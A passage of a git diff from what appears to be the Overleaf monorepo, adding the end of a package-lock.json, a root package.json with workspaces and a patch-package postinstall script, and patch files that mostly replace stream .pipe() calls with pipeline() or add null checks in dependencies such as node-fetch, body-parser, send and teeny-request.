"https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-1.9.0.tgz", + "integrity": "sha512-xIp7/apCFJuUHdDLWe8O1HIkb0kQrOMb/0u6FXQjemHn/ii5LrIzU6bdECnsiTF/GjZkMEKg1xdiZwNqDYlZ6g==", + "dev": true, + "dependencies": { + "isarray": "0.0.1" + } + }, + "services/web/node_modules/preact": { + "version": "10.19.3", + "resolved": "https://registry.npmjs.org/preact/-/preact-10.19.3.tgz", + "integrity": "sha512-nHHTeFVBTHRGxJXKkKu5hT8C/YWBkPso4/Gad6xuj5dbptt9iF9NZr9pHbPhBrnT2klheu7mHTxTZ/LjwJiEiQ==", + "dev": true, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/preact" + } + }, + "services/web/node_modules/react-bootstrap-5": { + "name": "react-bootstrap", + "version": "2.10.5", + "resolved": 
"https://registry.npmjs.org/react-bootstrap/-/react-bootstrap-2.10.5.tgz", + "integrity": "sha512-XueAOEn64RRkZ0s6yzUTdpFtdUXs5L5491QU//8ZcODKJNDLt/r01tNyriZccjgRImH1REynUc9pqjiRMpDLWQ==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.24.7", + "@restart/hooks": "^0.4.9", + "@restart/ui": "^1.6.9", + "@types/react-transition-group": "^4.4.6", + "classnames": "^2.3.2", + "dom-helpers": "^5.2.1", + "invariant": "^2.2.4", + "prop-types": "^15.8.1", + "prop-types-extra": "^1.1.0", + "react-transition-group": "^4.4.5", + "uncontrollable": "^7.2.1", + "warning": "^4.0.3" + }, + "peerDependencies": { + "@types/react": ">=16.14.8", + "react": ">=16.14.0", + "react-dom": ">=16.14.0" + }, + "peerDependenciesMeta": { + "@types/react": { + "optional": true + } + } + }, + "services/web/node_modules/react-bootstrap-5/node_modules/react-transition-group": { + "version": "4.4.5", + "resolved": "https://registry.npmjs.org/react-transition-group/-/react-transition-group-4.4.5.tgz", + "integrity": "sha512-pZcd1MCJoiKiBR2NRxeCRg13uCXbydPnmB4EOeRrY7480qNWO8IIgQG6zlDkm6uRMsURXPuKq0GWtiM59a5Q6g==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.5.5", + "dom-helpers": "^5.0.1", + "loose-envify": "^1.4.0", + "prop-types": "^15.6.2" + }, + "peerDependencies": { + "react": ">=16.6.0", + "react-dom": ">=16.6.0" + } + }, + "services/web/node_modules/regenerator-runtime": { + "version": "0.14.1", + "resolved": "https://registry.npmjs.org/regenerator-runtime/-/regenerator-runtime-0.14.1.tgz", + "integrity": "sha512-dYnhHh0nJoMfnkZs6GmmhFknAGRrLznOu5nc9ML+EJxGvrx6H7teuevqVqCuPcPK//3eDrrjQhehXVx9cnkGdw==", + "dev": true + }, + "services/web/node_modules/retry-request": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-5.0.2.tgz", + "integrity": "sha512-wfI3pk7EE80lCIXprqh7ym48IHYdwmAAzESdbU8Q9l7pnRCk9LEhpbOTNKjz6FARLm/Bl5m+4F0ABxOkYUujSQ==", + "dependencies": { + "debug": "^4.1.1", + "extend": "^3.0.2" + }, + "engines": { + "node": ">=12" + } + }, + "services/web/node_modules/sandboxed-module": { + "version": "2.3.0", + "resolved": "git+ssh://git@github.com/overleaf/node-sandboxed-module.git#cafa2d60f17ce75cc023e6f296eb8de79d92d35d", + "integrity": "sha512-ZNZDUOzXHKWBvxoRKm1ETmOBxEMrxn6iEgF3G8Ws7pgdNY18t3MIfnMmMGdDcF3//bp6VGgSXa+Gnpcovf/K3w==", + "dev": true, + "license": "MIT", + "dependencies": { + "require-like": "0.1.2", + "stack-trace": "0.0.10" + } + }, + "services/web/node_modules/schema-utils": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.0.tgz", + "integrity": "sha512-Gf9qqc58SpCA/xdziiHz35F4GNIWYWZrEshUc/G/r5BnLph6xpKuLeoJoQuj5WfBIx/eQLf+hmVPYHaxJu7V2g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "services/web/node_modules/sinon": { + "version": "7.5.0", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-7.5.0.tgz", + "integrity": "sha512-AoD0oJWerp0/rY9czP/D6hDTTUYGpObhZjMpd7Cl/A6+j0xBE+ayL/ldfggkBXUs0IkvIiM1ljM8+WkOc5k78Q==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.4.0", + "@sinonjs/formatio": "^3.2.1", + "@sinonjs/samsam": "^3.3.3", + "diff": "^3.5.0", + "lolex": "^4.2.0", + "nise": "^1.5.2", + "supports-color": "^5.5.0" + } + }, + "services/web/node_modules/sinon-mongoose": { + "version": "2.3.0", 
+ "resolved": "https://registry.npmjs.org/sinon-mongoose/-/sinon-mongoose-2.3.0.tgz", + "integrity": "sha512-d0rrL53wuDDs91GMCFAvQam64IpdVfkaxA4cGLTZfw1d5tTg6+F/D7F080d1n3d1gSHJBZLUf9pGpijC/x7xKQ==", + "dev": true, + "peerDependencies": { + "sinon": "5 - 7" + } + }, + "services/web/node_modules/sinon/node_modules/diff": { + "version": "3.5.0", + "resolved": "https://registry.npmjs.org/diff/-/diff-3.5.0.tgz", + "integrity": "sha512-A46qtFgd+g7pDZinpnwiRJtxbC1hpgf0uzP3iG89scHk0AUC7A1TGxf5OiiOUv/JMZR8GOt8hL900hV0bOy5xA==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "services/web/node_modules/sinon/node_modules/has-flag": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", + "integrity": "sha1-tdRU3CGZriJWmfNGfloH87lVuv0=", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "services/web/node_modules/sinon/node_modules/supports-color": { + "version": "5.5.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", + "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "dev": true, + "dependencies": { + "has-flag": "^3.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "services/web/node_modules/stack-trace": { + "version": "0.0.10", + "resolved": "https://registry.npmjs.org/stack-trace/-/stack-trace-0.0.10.tgz", + "integrity": "sha1-VHxws0fo0ytOEI6hoqFZ5f3eGcA=", + "dev": true, + "engines": { + "node": "*" + } + }, + "services/web/node_modules/stream-transform": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/stream-transform/-/stream-transform-3.2.1.tgz", + "integrity": "sha512-ApK+WTJ5bCOf0A2tlec1qhvr8bGEBM/sgXXB7mysdCYgZJO5DZeaV3h3G+g0HnAQ372P5IhiGqnW29zoLOfTzQ==" + }, + "services/web/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "services/web/node_modules/teeny-request": { + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/teeny-request/-/teeny-request-8.0.2.tgz", + "integrity": "sha512-34pe0a4zASseXZCKdeTiIZqSKA8ETHb1EwItZr01PAR3CLPojeAKgSjzeNS4373gi59hNulyDrPKEbh2zO9sCg==", + "dependencies": { + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": "^5.0.0", + "node-fetch": "^2.6.1", + "stream-events": "^1.0.5", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "services/web/node_modules/teeny-request/node_modules/agent-base": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-6.0.2.tgz", + "integrity": "sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ==", + "license": "MIT", + "dependencies": { + "debug": "4" + }, + "engines": { + "node": ">= 6.0.0" + } + }, + "services/web/node_modules/teeny-request/node_modules/https-proxy-agent": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.1.tgz", + "integrity": "sha512-dFcAjpTQFgoLMzC2VwU+C/CbS7uRL0lWmxDITmqm7C+7F0Odmj6s9l6alZc6AELXhrnggM2CeWSXHGOdX2YtwA==", + "license": "MIT", + "dependencies": { + "agent-base": "6", + "debug": "4" + }, + "engines": { + "node": ">= 6" + } + }, + "services/web/node_modules/terser-webpack-plugin": { + "version": "5.3.11", + "resolved": 
"https://registry.npmjs.org/terser-webpack-plugin/-/terser-webpack-plugin-5.3.11.tgz", + "integrity": "sha512-RVCsMfuD0+cTt3EwX8hSl2Ks56EbFHWmhluwcqoPKtBnfjiT6olaq7PRIRfhyU8nnC2MrnDrBLfrD/RGE+cVXQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@jridgewell/trace-mapping": "^0.3.25", + "jest-worker": "^27.4.5", + "schema-utils": "^4.3.0", + "serialize-javascript": "^6.0.2", + "terser": "^5.31.1" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.1.0" + }, + "peerDependenciesMeta": { + "@swc/core": { + "optional": true + }, + "esbuild": { + "optional": true + }, + "uglify-js": { + "optional": true + } + } + }, + "services/web/node_modules/uuid": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "funding": [ + "https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "services/web/node_modules/warning": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/warning/-/warning-4.0.3.tgz", + "integrity": "sha512-rpJyN222KWIvHJ/F53XSZv0Zl/accqHR8et1kpaMTD/fLCRxtV8iX8czMzY7sVZupTI3zcUTg8eycS2kNF9l6w==", + "dev": true, + "dependencies": { + "loose-envify": "^1.0.0" + } + }, + "services/web/node_modules/xml-crypto": { + "version": "2.1.6", + "resolved": "https://registry.npmjs.org/xml-crypto/-/xml-crypto-2.1.6.tgz", + "integrity": "sha512-jjvpO8vHNV8QFhW5bMypP+k4BjBqHe/HrpIwpPcdUnUTIJakSIuN96o3Sdah4tKu2z64kM/JHEH8iEHGCc6Gyw==", + "license": "MIT", + "dependencies": { + "@xmldom/xmldom": "^0.7.9", + "xpath": "0.0.32" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "services/web/node_modules/xpath": { + "version": "0.0.32", + "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.32.tgz", + "integrity": "sha512-rxMJhSIoiO8vXcWvSifKqhvV96GjiD5wYb8/QHdoRyQvraTpp4IEv944nhGausZZ3u7dhQXteZuZbaqfpB7uYw==", + "license": "MIT", + "engines": { + "node": ">=0.6.0" + } + }, + "services/web/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "tools/saas-e2e": { + "name": "@overleaf/saas-e2e", + "devDependencies": { + "@isomorphic-git/lightning-fs": "^4.6.0", + "@testing-library/cypress": "^10.0.1", + "@types/adm-zip": "^0.5.5", + "@types/pdf-parse": "^1.1.4", + "@types/uuid": "^9.0.8", + "adm-zip": "^0.5.12", + "cypress": "13.13.2", + "isomorphic-git": "^1.25.10", + "mailtrap": "^3.4.0", + "pdf-parse": "^1.1.1", + "typescript": "^5.0.4", + "uuid": "^9.0.1" + } + }, + "tools/saas-e2e/node_modules/uuid": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "dev": true, + "funding": [ + "https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "license": "MIT", + "bin": { + "uuid": "dist/bin/uuid" + } + } + } +} diff --git a/package.json b/package.json new file mode 100644 index 0000000..7dc9a63 --- /dev/null +++ b/package.json @@ -0,0 +1,80 @@ +{ + "name": "overleaf", + "private": true, + "dependencies": { + "patch-package": "^8.0.0" + }, + "devDependencies": { + 
"@types/chai": "^4.3.0", + "@types/chai-as-promised": "^7.1.8", + "@types/mocha": "^10.0.6", + "@typescript-eslint/eslint-plugin": "^8.0.0", + "@typescript-eslint/parser": "^8.0.0", + "eslint": "^8.15.0", + "eslint-config-prettier": "^8.5.0", + "eslint-config-standard": "^17.0.0", + "eslint-plugin-chai-expect": "^3.0.0", + "eslint-plugin-chai-friendly": "^0.7.2", + "eslint-plugin-cypress": "^2.15.1", + "eslint-plugin-import": "^2.26.0", + "eslint-plugin-mocha": "^10.1.0", + "eslint-plugin-node": "^11.1.0", + "eslint-plugin-prettier": "^4.0.0", + "eslint-plugin-promise": "^6.0.0", + "eslint-plugin-unicorn": "^56.0.0", + "prettier": "3.3.3", + "typescript": "^5.5.4" + }, + "overrides": { + "cross-env": { + "cross-spawn": "^7.0.6" + }, + "fetch-mock": { + "path-to-regexp": "3.3.0" + }, + "google-gax": { + "protobufjs": "^7.2.5" + }, + "swagger-tools": { + "body-parser": "1.20.3", + "multer": "1.4.5-lts.1", + "path-to-regexp": "3.3.0", + "qs": "6.13.0" + } + }, + "scripts": { + "format": "prettier --list-different $PWD/'**/*.js'", + "format:fix": "prettier --write $PWD/'**/*.js'", + "lint": "eslint --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix .", + "postinstall": "patch-package" + }, + "workspaces": [ + "jobs/mirror-documentation", + "libraries/*", + "services/analytics", + "services/chat", + "services/clsi", + "services/clsi-cache", + "services/clsi-perf", + "services/contacts", + "services/docstore", + "services/document-updater", + "services/filestore", + "services/freegeoip", + "services/github-sync", + "services/history-v1", + "services/idp", + "services/latexqc", + "services/notifications", + "services/project-history", + "services/real-time", + "services/references", + "services/templates", + "services/third-party-datastore", + "services/third-party-references", + "services/tpdsworker", + "services/web", + "tools/saas-e2e" + ] +} diff --git a/patches/@google-cloud+storage++retry-request+5.0.2.patch b/patches/@google-cloud+storage++retry-request+5.0.2.patch new file mode 100644 index 0000000..bbf8a8f --- /dev/null +++ b/patches/@google-cloud+storage++retry-request+5.0.2.patch @@ -0,0 +1,30 @@ +diff --git a/node_modules/@google-cloud/storage/node_modules/retry-request/index.js b/node_modules/@google-cloud/storage/node_modules/retry-request/index.js +index a293298..df21af6 100644 +--- a/node_modules/@google-cloud/storage/node_modules/retry-request/index.js ++++ b/node_modules/@google-cloud/storage/node_modules/retry-request/index.js +@@ -1,6 +1,6 @@ + 'use strict'; + +-const {PassThrough} = require('stream'); ++const { PassThrough, pipeline } = require('stream'); + const debug = require('debug')('retry-request'); + const extend = require('extend'); + +@@ -166,7 +166,7 @@ function retryRequest(requestOpts, opts, callback) { + }) + .on('complete', retryStream.emit.bind(retryStream, 'complete')); + +- requestStream.pipe(delayStream); ++ pipeline(requestStream, delayStream, () => {}); + } else { + activeRequest = opts.request(requestOpts, onResponse); + } +@@ -232,7 +232,7 @@ function retryRequest(requestOpts, opts, callback) { + // No more attempts need to be made, just continue on. 
+ if (streamMode) { + retryStream.emit('response', response); +- delayStream.pipe(retryStream); ++ pipeline(delayStream, retryStream, () => {}); + requestStream.on('error', err => { + retryStream.destroy(err); + }); diff --git a/patches/@google-cloud+storage++teeny-request+8.0.2.patch b/patches/@google-cloud+storage++teeny-request+8.0.2.patch new file mode 100644 index 0000000..738eef5 --- /dev/null +++ b/patches/@google-cloud+storage++teeny-request+8.0.2.patch @@ -0,0 +1,50 @@ +diff --git a/node_modules/@google-cloud/storage/node_modules/teeny-request/build/src/index.js b/node_modules/@google-cloud/storage/node_modules/teeny-request/build/src/index.js +index a2251ca..e29e796 100644 +--- a/node_modules/@google-cloud/storage/node_modules/teeny-request/build/src/index.js ++++ b/node_modules/@google-cloud/storage/node_modules/teeny-request/build/src/index.js +@@ -166,27 +166,27 @@ function teenyRequest(reqOpts, callback) { + } + if (callback === undefined) { + // Stream mode +- const requestStream = streamEvents(new stream_1.PassThrough()); +- // eslint-disable-next-line @typescript-eslint/no-explicit-any +- let responseStream; +- requestStream.once('reading', () => { +- if (responseStream) { +- responseStream.pipe(requestStream); +- } +- else { +- requestStream.once('response', () => { +- responseStream.pipe(requestStream); +- }); +- } +- }); ++ const requestStream = new stream_1.PassThrough(); ++ // // eslint-disable-next-line @typescript-eslint/no-explicit-any ++ // let responseStream; ++ // requestStream.once('reading', () => { ++ // if (responseStream) { ++ // responseStream.pipe(requestStream); ++ // } ++ // else { ++ // requestStream.once('response', () => { ++ // responseStream.pipe(requestStream); ++ // }); ++ // } ++ // }); + options.compress = false; + teenyRequest.stats.requestStarting(); + (0, node_fetch_1.default)(uri, options).then(res => { +- teenyRequest.stats.requestFinished(); +- responseStream = res.body; +- responseStream.on('error', (err) => { +- requestStream.emit('error', err); +- }); ++ teenyRequest.stats.requestFinished(); stream_1.pipeline(res.body, requestStream, () => {}); ++ // responseStream = res.body; ++ // responseStream.on('error', (err) => { ++ // requestStream.emit('error', err); ++ // }); + const response = fetchToRequestResponse(options, res); + requestStream.emit('response', response); + }, err => { diff --git a/patches/README.md b/patches/README.md new file mode 100644 index 0000000..c158e27 --- /dev/null +++ b/patches/README.md @@ -0,0 +1 @@ +The patches in this folder are applied by `patch-package` to dependencies, particularly those which need changes that are difficult to apply upstream. diff --git a/patches/body-parser+1.20.3.patch b/patches/body-parser+1.20.3.patch new file mode 100644 index 0000000..b41d212 --- /dev/null +++ b/patches/body-parser+1.20.3.patch @@ -0,0 +1,44 @@ +diff --git a/node_modules/body-parser/lib/read.js b/node_modules/body-parser/lib/read.js +index fce6283..6131c31 100644 +--- a/node_modules/body-parser/lib/read.js ++++ b/node_modules/body-parser/lib/read.js +@@ -18,7 +18,7 @@ var iconv = require('iconv-lite') + var onFinished = require('on-finished') + var unpipe = require('unpipe') + var zlib = require('zlib') +- ++var Stream = require('stream') + /** + * Module exports. 
+ */ +@@ -166,25 +166,25 @@ function contentstream (req, debug, inflate) { + case 'deflate': + stream = zlib.createInflate() + debug('inflate body') +- req.pipe(stream) ++ // req.pipe(stream) + break + case 'gzip': + stream = zlib.createGunzip() + debug('gunzip body') +- req.pipe(stream) ++ // req.pipe(stream) + break + case 'identity': + stream = req + stream.length = length +- break ++ return req + default: + throw createError(415, 'unsupported content encoding "' + encoding + '"', { + encoding: encoding, + type: 'encoding.unsupported' + }) + } +- +- return stream ++ var pass = new Stream.PassThrough(); Stream.pipeline(req, stream, pass, () => {}) ++ return pass + } + + /** diff --git a/patches/forwarded+0.2.0.patch b/patches/forwarded+0.2.0.patch new file mode 100644 index 0000000..7c13376 --- /dev/null +++ b/patches/forwarded+0.2.0.patch @@ -0,0 +1,13 @@ +diff --git a/node_modules/forwarded/index.js b/node_modules/forwarded/index.js +index b2b6bdd..75e6254 100644 +--- a/node_modules/forwarded/index.js ++++ b/node_modules/forwarded/index.js +@@ -46,7 +46,7 @@ function forwarded (req) { + function getSocketAddr (req) { + return req.socket + ? req.socket.remoteAddress +- : req.connection.remoteAddress ++ : req.connection && req.connection.remoteAddress + } + + /** diff --git a/patches/node-fetch+2.7.0.patch b/patches/node-fetch+2.7.0.patch new file mode 100644 index 0000000..49d0752 --- /dev/null +++ b/patches/node-fetch+2.7.0.patch @@ -0,0 +1,76 @@ +diff --git a/node_modules/node-fetch/lib/index.js b/node_modules/node-fetch/lib/index.js +index 567ff5d..8eb45f7 100644 +--- a/node_modules/node-fetch/lib/index.js ++++ b/node_modules/node-fetch/lib/index.js +@@ -545,8 +545,8 @@ function clone(instance) { + // tee instance body + p1 = new PassThrough(); + p2 = new PassThrough(); +- body.pipe(p1); +- body.pipe(p2); ++ Stream.pipeline(body, p1, () => {}); ++ Stream.pipeline(body, p2, () => {}); + // set instance body to teed body and return the other teed body + instance[INTERNALS].body = p1; + body = p2; +@@ -648,14 +648,14 @@ function writeToStream(dest, instance) { + // body is null + dest.end(); + } else if (isBlob(body)) { +- body.stream().pipe(dest); ++ Stream.pipeline(body.stream(), dest, () => {}); + } else if (Buffer.isBuffer(body)) { + // body is buffer + dest.write(body); + dest.end(); + } else { + // body is stream +- body.pipe(dest); ++ Stream.pipeline(body, dest, () => {}); + } + } + +@@ -1638,7 +1638,7 @@ function fetch(url, opts) { + res.once('end', function () { + if (signal) signal.removeEventListener('abort', abortAndFinalize); + }); +- let body = res.pipe(new PassThrough$1()); ++ let body = Stream.pipeline(res, new PassThrough(), error => { if (error) reject(error); }); + + const response_options = { + url: request.url, +@@ -1679,7 +1679,7 @@ function fetch(url, opts) { + + // for gzip + if (codings == 'gzip' || codings == 'x-gzip') { +- body = body.pipe(zlib.createGunzip(zlibOptions)); ++ body = Stream.pipeline(body, zlib.createGunzip(zlibOptions), error => { if (error) reject(error); }); + response = new Response(body, response_options); + resolve(response); + return; +@@ -1689,13 +1689,13 @@ function fetch(url, opts) { + if (codings == 'deflate' || codings == 'x-deflate') { + // handle the infamous raw deflate response from old servers + // a hack for old IIS and Apache servers +- const raw = res.pipe(new PassThrough$1()); ++ const raw = Stream.pipeline(res, new PassThrough(), error => { if (error) reject(error); }); + raw.once('data', function (chunk) { + // see 
http://stackoverflow.com/questions/37519828 + if ((chunk[0] & 0x0F) === 0x08) { +- body = body.pipe(zlib.createInflate()); ++ body = Stream.pipeline(body, zlib.createInflate(), error => { if (error) reject(error); }); + } else { +- body = body.pipe(zlib.createInflateRaw()); ++ body = Stream.pipeline(body, zlib.createInflateRaw(), error => { if (error) reject(error); }); + } + response = new Response(body, response_options); + resolve(response); +@@ -1712,7 +1712,7 @@ function fetch(url, opts) { + + // for br + if (codings == 'br' && typeof zlib.createBrotliDecompress === 'function') { +- body = body.pipe(zlib.createBrotliDecompress()); ++ body = Stream.pipeline(body, zlib.createBrotliDecompress(), error => { if (error) reject(error); }); + response = new Response(body, response_options); + resolve(response); + return; diff --git a/patches/passport-oauth2+1.6.1.patch b/patches/passport-oauth2+1.6.1.patch new file mode 100644 index 0000000..25a571b --- /dev/null +++ b/patches/passport-oauth2+1.6.1.patch @@ -0,0 +1,13 @@ +diff --git a/node_modules/passport-oauth2/lib/utils.js b/node_modules/passport-oauth2/lib/utils.js +index 486f9e1..4584507 100644 +--- a/node_modules/passport-oauth2/lib/utils.js ++++ b/node_modules/passport-oauth2/lib/utils.js +@@ -24,7 +24,7 @@ exports.originalURL = function(req, options) { + var trustProxy = options.proxy; + + var proto = (req.headers['x-forwarded-proto'] || '').toLowerCase() +- , tls = req.connection.encrypted || (trustProxy && 'https' == proto.split(/\s*,\s*/)[0]) ++ , tls = (req.connection && req.connection.encrypted) || (trustProxy && 'https' == proto.split(/\s*,\s*/)[0]) + , host = (trustProxy && req.headers['x-forwarded-host']) || req.headers.host + , protocol = tls ? 'https' : 'http' + , path = req.url || ''; diff --git a/patches/retry-request+4.2.2.patch b/patches/retry-request+4.2.2.patch new file mode 100644 index 0000000..f3096b5 --- /dev/null +++ b/patches/retry-request+4.2.2.patch @@ -0,0 +1,30 @@ +diff --git a/node_modules/retry-request/index.js b/node_modules/retry-request/index.js +index 6cd6f65..39efb89 100644 +--- a/node_modules/retry-request/index.js ++++ b/node_modules/retry-request/index.js +@@ -1,6 +1,6 @@ + 'use strict'; + +-var { PassThrough } = require('stream'); ++var { PassThrough, pipeline } = require('stream'); + var debug = require('debug')('retry-request'); + var extend = require('extend'); + +@@ -164,7 +164,7 @@ function retryRequest(requestOpts, opts, callback) { + }) + .on('complete', retryStream.emit.bind(retryStream, 'complete')); + +- requestStream.pipe(delayStream); ++ pipeline(requestStream, delayStream, () => {}); + } else { + activeRequest = opts.request(requestOpts, onResponse); + } +@@ -220,7 +220,7 @@ function retryRequest(requestOpts, opts, callback) { + // No more attempts need to be made, just continue on. 
+ if (streamMode) { + retryStream.emit('response', response); +- delayStream.pipe(retryStream); ++ pipeline(delayStream, retryStream, () => {}); + requestStream.on('error', function (err) { + retryStream.destroy(err); + }); diff --git a/patches/send+0.19.0.patch b/patches/send+0.19.0.patch new file mode 100644 index 0000000..6635078 --- /dev/null +++ b/patches/send+0.19.0.patch @@ -0,0 +1,57 @@ +diff --git a/node_modules/send/index.js b/node_modules/send/index.js +index 768f8ca..a882f4d 100644 +--- a/node_modules/send/index.js ++++ b/node_modules/send/index.js +@@ -788,29 +788,29 @@ SendStream.prototype.stream = function stream (path, options) { + // pipe + var stream = fs.createReadStream(path, options) + this.emit('stream', stream) +- stream.pipe(res) +- +- // cleanup +- function cleanup () { +- destroy(stream, true) +- } +- +- // response finished, cleanup +- onFinished(res, cleanup) +- +- // error handling +- stream.on('error', function onerror (err) { +- // clean up stream early +- cleanup() +- +- // error +- self.onStatError(err) +- }) +- +- // end +- stream.on('end', function onend () { +- self.emit('end') +- }) ++ Stream.pipeline(stream, res, err => { if (err) { self.onStatError(err) } else { self.emit('end') } }) ++ ++ // // cleanup ++ // function cleanup () { ++ // destroy(stream, true) ++ // } ++ // ++ // // response finished, cleanup ++ // onFinished(res, cleanup) ++ // ++ // // error handling ++ // stream.on('error', function onerror (err) { ++ // // clean up stream early ++ // cleanup() ++ // ++ // // error ++ // self.onStatError(err) ++ // }) ++ // ++ // // end ++ // stream.on('end', function onend () { ++ // self.emit('end') ++ // }) + } + + /** diff --git a/patches/teeny-request+7.1.3.patch b/patches/teeny-request+7.1.3.patch new file mode 100644 index 0000000..213ed04 --- /dev/null +++ b/patches/teeny-request+7.1.3.patch @@ -0,0 +1,49 @@ +diff --git a/node_modules/teeny-request/build/src/index.js b/node_modules/teeny-request/build/src/index.js +index f209888..e9fe982 100644 +--- a/node_modules/teeny-request/build/src/index.js ++++ b/node_modules/teeny-request/build/src/index.js +@@ -166,27 +166,27 @@ function teenyRequest(reqOpts, callback) { + } + if (callback === undefined) { + // Stream mode +- const requestStream = streamEvents(new stream_1.PassThrough()); ++ const requestStream = new stream_1.PassThrough(); + // eslint-disable-next-line @typescript-eslint/no-explicit-any +- let responseStream; +- requestStream.once('reading', () => { +- if (responseStream) { +- responseStream.pipe(requestStream); +- } +- else { +- requestStream.once('response', () => { +- responseStream.pipe(requestStream); +- }); +- } +- }); ++ // let responseStream; ++ // requestStream.once('reading', () => { ++ // if (responseStream) { ++ // responseStream.pipe(requestStream); ++ // } ++ // else { ++ // requestStream.once('response', () => { ++ // responseStream.pipe(requestStream); ++ // }); ++ // } ++ // }); + options.compress = false; + teenyRequest.stats.requestStarting(); + node_fetch_1.default(uri, options).then(res => { +- teenyRequest.stats.requestFinished(); +- responseStream = res.body; +- responseStream.on('error', (err) => { +- requestStream.emit('error', err); +- }); ++ teenyRequest.stats.requestFinished(); stream_1.pipeline(res.body, requestStream, () => {}); ++ // responseStream = res.body; ++ // responseStream.on('error', (err) => { ++ // requestStream.emit('error', err); ++ // }); + const response = fetchToRequestResponse(options, res); + requestStream.emit('response', response); 
+ }, err => { diff --git a/patches/thread-loader+4.0.2.patch b/patches/thread-loader+4.0.2.patch new file mode 100644 index 0000000..25b9691 --- /dev/null +++ b/patches/thread-loader+4.0.2.patch @@ -0,0 +1,81 @@ +diff --git a/node_modules/thread-loader/dist/WorkerPool.js b/node_modules/thread-loader/dist/WorkerPool.js +index 4145779..f0ff068 100644 +--- a/node_modules/thread-loader/dist/WorkerPool.js ++++ b/node_modules/thread-loader/dist/WorkerPool.js +@@ -258,6 +258,19 @@ class PoolWorker { + finalCallback(); + break; + } ++ case 'logMessage': ++ { ++ const { ++ data: { loggerName, methodName, args } ++ } = message; ++ const { ++ data: jobData ++ } = this.jobs[id]; ++ const logger = jobData.getLogger(loggerName); ++ logger[methodName].apply(logger, args); ++ finalCallback(); ++ break; ++ } + case 'emitWarning': + { + const { +diff --git a/node_modules/thread-loader/dist/index.js b/node_modules/thread-loader/dist/index.js +index 75cd30f..d834af6 100644 +--- a/node_modules/thread-loader/dist/index.js ++++ b/node_modules/thread-loader/dist/index.js +@@ -43,6 +43,7 @@ function pitch() { + sourceMap: this.sourceMap, + emitError: this.emitError, + emitWarning: this.emitWarning, ++ getLogger: this.getLogger, + loadModule: this.loadModule, + resolve: this.resolve, + getResolve: this.getResolve, +diff --git a/node_modules/thread-loader/dist/worker.js b/node_modules/thread-loader/dist/worker.js +index 8e67959..aca94f1 100644 +--- a/node_modules/thread-loader/dist/worker.js ++++ b/node_modules/thread-loader/dist/worker.js +@@ -90,6 +90,22 @@ function writeJson(data) { + writePipeWrite(lengthBuffer); + writePipeWrite(messageBuffer); + } ++const LOGGER_METHODS = ['error', 'warn', 'info', 'log', 'debug', 'trace', 'group', 'groupEnd', 'groupCollapsed', 'status', 'clear', 'profile', 'profileEnd']; ++class Logger { ++ constructor(id, loggerName) { ++ this.id = id ++ this.loggerName = loggerName ++ for (const methodName of 